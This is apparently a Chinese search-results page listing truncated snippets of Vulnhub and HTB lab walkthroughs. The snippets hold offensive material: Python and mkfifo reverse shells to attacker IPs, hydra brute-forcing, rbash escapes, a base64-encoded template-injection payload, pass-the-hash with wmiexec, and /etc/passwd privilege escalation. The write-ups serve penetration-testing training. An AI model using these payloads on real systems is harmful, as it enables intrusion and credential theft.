首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏打靶记录

    vulnhub打靶记录:TBBT2

    TBBT2 靶机地址: https://download.vulnhub.com/tbbt/TBBT2.ova 主机存活扫描 ┌──(kali㉿kali)-[~]└─$ sudo arp-scan -l tmp = tmp - (Math.floor((tmp/Math.pow(256,2))) \* Math.pow(256,2)); if(Math.floor((tmp/Math.pow : `-a2': invalid number specifier-rbash: /dev/null: restricted: cannot redirect outputsheldon@tbbt2:~ cd /tmpsheldon@tbbt2:/tmp$ pwd/tmpsheldon@tbbt2:/tmp$ echo "/bin/bash" > slsheldon@tbbt2:/tmp$ chmod +777 slsheldon@tbbt2:/tmp$ export PATH=/tmp:$PATHsheldon@tbbt2:/tmp$ ..

    37400编辑于 2024-12-17
  • 来自专栏XRSec.Blog

    Vulnhub靶机打靶-hard-socnet2

    3493 XMLRPC 逆向工程 动态调试 缓冲区溢出 漏洞利用代码编写 靶机下载地址:https://download.vulnhub.com/boredhackerblog/hard_socnet2. ova 攻击方法有2种,CVE-2021-3493 另类提权方式 攻击主机:kali Linux 2021 192.168.0.103 目标主机: Ubuntu 18 攻击开始 nmap -p- -sV -2021-9493(蚁剑的shell无法提权shell需要转nc shell) 20210905143059514008.png 上传exp文件运行,getshell,id查看自己的身份为root 打靶结束 能如此轻松的解决这个靶机根本原因也是因为——该靶机为2020年的靶机,而刚才的打靶过程中,可是用到了2021年的CVE,也就是说我在用前朝的剑斩本朝的君! 8000/") as proxy: res = str(proxy.secure_cmd('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>

    1K30编辑于 2022-03-12
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-five2靶机渗透实战

    2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第10台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! wordpress插件漏洞利用 php反弹 流量嗅探tcpdump Linux常用命令 0x02 信息搜集 端口发现 端口服务探测 值得注意的是: 发现开了80端口却无法访问,是重定向到five86-2域名 抓包命令为 timeout 120 tcpdump -w 1.pcap -i veth37191d0 其中timeout 120是指2分钟,-w是将结果输出到文件,-i是指定监听端口 同理,把第一个br-eca385 esomepasswford 发现ftp的密码为esomepasswford 尝试用户去密码喷洒一下ftp服务 hydra -L sshuser.txt -p 'esomepasswford' five86-2

    35620编辑于 2023-09-14
  • 来自专栏网络安全自修室

    每周打靶 | Vulnhub-DC2靶机渗透实战

    2 内容速览 0x00前言 这是网络安全自修室每周带星球小伙伴一起实战的第2台靶机,欢迎有兴趣的小伙伴一起加入实操,毕竟实践出真知! 爆破ssh hydra -L users.txt -P passwds.txt dc-2 -s 7744 ssh -vV [7744][ssh] host: dc-2 login: tom password : parturient 登录ssh ssh tom@dc-2 -p 7744 tom@DC-2:~$ whoami -rbash: whoami: command not found tom@DC- 2:~$ pwd /home/tom tom@DC-2:~$ ls flag3.txt usr tom@DC-2:~$ cat flag3.txt -rbash: cat: command not found 密码可以执行git sudo -l jerry@DC-2:/home$ sudo -l Matching Defaults entries for jerry on DC-2: env_reset

    55210编辑于 2023-09-02
  • 来自专栏YX’blog

    打靶练习】Certify

    0 /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2: 2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync ⼀般打靶场这种后续都可以利⽤到。 [01]: Red Hat VirtIO Ethernet Adapter 连接名: 以太网 2 启用 172.22.9.7 -username administrator -domain xiaorang.lab 成功获取到hash后⽤wmiexec就ok了 python wmiexec.py -hashes :2f1b57eefb2d152196836b0516abea80

    26310编辑于 2025-04-09
  • 来自专栏YX’blog

    打靶练习】Delegation

    \Windows\System32\cmd.exe" /c net localgroup administrators Adrian /add 然后启动服务 sc start gupdate flag2

    10210编辑于 2025-07-13
  • 来自专栏极安御信安全研究院

    渗透专题丨Vulnhub-Tr0ll2靶机打靶

    192.168.38.140 '() { :;};/bin/bash':可以看到这里已经链接到:查找高权限文件:可以看到有root可疑文件,运行不同的root文件,发现需要传入参数,输入500个A,测试到door2中 r00t会崩溃,是我们需要的,抠出来:接下来用ida打开分析一下:可以看到这是一个缓冲区溢出漏洞,生成随机字符串:Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq

    30030编辑于 2023-07-13
  • 来自专栏瞳瞳too的学习笔记

    打靶实战 ---NOOB爆破

    4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 dc:e8:ad:80:35:81:c4:29:7e:cf:e4:70:f2: 69:d9:96 (RSA) | 256 46:20:20:03:9c:97:35:f6:2d:5d:62:4a:be:6c:95:8e (ECDSA) |_ 256 ae:90:88:f6:63 :8d:dc:60:fa:ff:fc:70:12:e4:f4:1f (ED25519) MAC Address: 00:0C:29:1B:B5:A2 (VMware) Warning: OSScan results anonymous,密码anonymous采用匿名登录 默认是ASCII模式,输入binary切换为二进制模式 get cred.txt welcome将ftp文件获取到本地 打开cred.txt获取文件内容Y2hhbXA6cGFzc3dvcmQ

    38810编辑于 2023-10-26
  • 来自专栏红队蓝军

    htb打靶记录-SolarLab

    LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0xNDU3ODUzNjcwMTMzNTUyOTgzMDExNzk0MzIxNzYKQ29udGVudC1EaXNwb3NpdGlvbjogZm9ybS1kYXRhOyBuYW1lPSJ0aW1lX2ludGVydmFsIgoKMjAyOS0wNS0yNiB0byAyMDI5LTA1LTI3Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ibGVhdmVfcmVxdWVzdCIKCntjbWR9Ci0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tMTQ1Nzg1MzY3MDEzMzU1Mjk4MzAxMTc5NDMyMTc2CkNvbnRlbnQtRGlzcG9zaXRpb246IGZvcm0tZGF0YTsgbmFtZT0ic2lnbmF0dXJlIjsgZmlsZW5hbWU9IlVudGl0bGVkLnBuZyIKQ29udGVudC1UeXBlOiBpbWFnZS9wbmcKColQTkcKGgoAAAAKSUhEUgAAAAoAAAAKCAIAAAACUFjqAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAAApSURBVChTY9i fMlJCSAbARA5gNVQFkjGzAwAADL7QTzijujCwAAAABJRU5ErkJgggotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3NgpDb250ZW50LURpc3Bvc2l0aW9uOiBmb3JtLWRhdGE7IG5hbWU9InVzZXJfaW5wdXQiCgo8cD5hc2RmPC9wPgotLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLTE0NTc4NTM2NzAxMzM1NTI5ODMwMTE3OTQzMjE3Ni0t PGZvbnQgY29sb3I9IlsgWyBnZXRhdHRyKHBvdywgV29yZCgnX19nbG9iYWxzX18nKSlbJ29zJ10uc3lzdGVtKCd7Y21kfScpIGZvciBXb3JkIGluIFsgb3JnVHlwZUZ1biggJ1dvcmQnLCAoc3RyLCksIHsgJ211dGF0ZWQnOiAxLCAnc3RhcnRzd2l0aCc6IGxhbWJkYSBzZWxmLCB4OiBGYWxzZSwgJ19fZXFfXyc6IGxhbWJkYSBzZWxmLCB4OiBzZWxmLm11dGF0ZSgpIGFuZCBzZWxmLm11dGF0ZWQgPCAwIGFuZCBzdHIoc2VsZikgPT0geCwgJ211dGF0ZSc6IGxhbWJkYSBzZWxmOiB7c2V0YXR0cihzZWxmLCAnbXV0YXRlZCcsIHNlbGYubXV0YXRlZCAtIDEpfSwgJ19faGFzaF9fJzogbGFtYmRhIHNlbGY6IGhhc2goc3RyKHNlbGYpKSwgfSwgKSBdIF0gZm9yIG9yZ1R5cGVGdW4gaW4gW3R5cGUodHlwZSgxKSldXSBhbmQgJ3JlZCciPgoxPC9mb250PjwvcD4

    36910编辑于 2024-07-15
  • 来自专栏YX’blog

    打靶练习】medium_socnet

    subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.10",777));os.dup2( s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]); 可以看到 应该立马就猜到有可能这是在docker里了 我们来继续验证下是不是在docker里 1.ls -alh /.dockerenv 一般来说如果在非docker环境下是没有这个.dockerenv文件的 2. python2 -m SimpleHTTPServer 8888 接下来就利用icmp去循环查找一下其他机器 for i in $(seq 1 255); do ping -c 1 172.17.0.

    39730编辑于 2023-09-10
  • 来自专栏红蓝对抗

    vulntarget-i 打靶记录

    利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向 扫描存活指向第二台135主机,利用CS开了socket代理进内网 No2 downloadUrl=参数&directoryName=suce 不会显示下载成功,但是文件的确会进行自己解压 尝试访问webshell页面白色成功解析,利用蚁剑成功连接 2.2 getshell-2 sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC

    63530编辑于 2022-12-23
  • 来自专栏乌鸦安全

    vulntarget-b_打靶记录

    本文作者NaMi 01vulntarget-b拓扑 IP1:192.168.10.104 IP2:10.0.20.30 搭建好环境之后,开始我们的实验。 vulntarget-2下载地址 百度云: 链接: https://pan.baidu.com/s/1Hdqkojmu-CeIuPr2gLWHwA 提取码:s4ka 阿里云暂不支持zip文件分享。。。。 m=client&f=download&version=1&link=ZnRwOi8vMTkyLjE2OC41Mi4xL3NoZWxsLnBocA== link位置是base64编码的地址 然后正常访问到下载的木马文件

    1.8K30编辑于 2022-01-04
  • 来自专栏XRSec.Blog

    Vulnhub EvilBox靶机打靶过程

    192.168.0.104 Linux Kernel 192.168.0.103 涉及技术 主机发现 网络扫描 强制访问 参数爆破 文件包含 PHP封装器 任意文件读取 SSH公钥登录 离线密码破解 系统权限漏洞利用 打靶开始 然后使用john进行破解 20210925234919702076.png 得出密码为 unicorn 进行登录 登录成功,然后使用find命令查找可以进行提权的文件 find / -perm /4000 2 > /dev/null find / -perm /2000 2 > /dev/null find / /writable 2 > /dev/null 存在/etc/passwd可以进行文件写入 使用 ,openssl 生成一段密文 openssl passwd -1 然后替换/etc/passwd里面的x 20210925234956721039.png 提权成功,打靶结束 XRSec has the

    73710编辑于 2022-03-12
  • 来自专栏乌鸦安全

    vulntarget-h 打靶记录

    : 192.168.153.130 192.168.1.102 win7 > ip :192.168.153.128 win10 > ip : 192.168.153.129 0x02 打靶记录

    91220编辑于 2022-08-11
  • 来自专栏乌鸦安全

    vulntarget-f打靶记录

    拓扑 kali:192.168.0.108 centos: 192.168.0.104 2. 扫了一下发现了一个30.2的ip,开放了22和8081 打开8081端口之后是一个web服务Nexus Repository Manager: 老样子,百度搜索历史漏洞,看漏洞都是后台的,这里根据flag2的提示 1、第一个提权,需要翻目录,把目录当成了文件 2、第二个提权也耗费了好多时间,最终找了个集成好的的工具进行利用。

    1.2K20编辑于 2022-06-07
  • 来自专栏乌鸦安全

    vulntarget-i 打靶记录

    利用抓到的普通用户明文上了远程桌面读取到了后台账号密码:administrator/8B..123admin,尝试内网横向 扫描存活指向第二台135主机,利用CS开了socket代理进内网 No2 downloadUrl=参数&directoryName=suce 不会显示下载成功,但是文件的确会进行自己解压 尝试访问webshell页面白色成功解析,利用蚁剑成功连接 2.2 getshell-2 sp_OAMethod @ObjectToken,'Write',NULL, @DATAEXEC sp_OAMethod @ObjectToken,'SaveToFile',NULL, @filepath,2EXEC

    91810编辑于 2022-12-19
  • 来自专栏乌鸦安全

    【永久开源】vulntarget-a 打靶记录

    2. 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f 27 ba 60 3b 91 d5 fa 53 fc 5b 46 1a ab 19 68 4b a3 44 b4 0c 38 a7 ac 2a 67 ad 5d b9 ee 1b cc e4 5d 82 53 8e 21 d1 8c 7e 3a cb 06 e2 04 6a 2e 4d 35 5a a2 64 c3 85 4c a3 e2 84 9f 30 eb 02 20 3c ba 44 f0 e2 3f

    4.5K30编辑于 2022-03-11
  • 来自专栏安全小圈

    打靶系列之- DC-4

    使用BurpSuite对网页登录框,进行密码账号爆破 2. 通过命令注入漏洞,进行命令注入 3. 使用hydra对ssh进行爆破 4. 通过现有的脚本进行提权操作 -END-

    92430发布于 2021-05-28
  • 来自专栏安全小圈

    打靶系列之DC-6

    #获取端口 nmap -A 192.168.1.148 可以看到靶机开放了80端口和22端口,访问一下页面 可惜的是访问不了,因为做了域名绑定,所以需要我们在本地做个域名映射,这个和之前DC-2是一样的问题

    69550发布于 2021-09-18
  • 来自专栏安全小圈

    打靶系列之-DC-5

    python -c 'import pty;pty.spawn ( "/bin/bash")' 06 提权 #通过find提权,查看用root权限运行的命令 find / -perm -4000 2> screen 4.5.0 可以看到有两个漏洞利用,这里我们使用linux/local/41154.sh脚本 进入目录看下脚本 这个脚本主要由三部分组成,原本是直接执行脚本,可惜这个脚本有问题,所以需要创建2个文件

    1.1K40发布于 2021-08-26
领券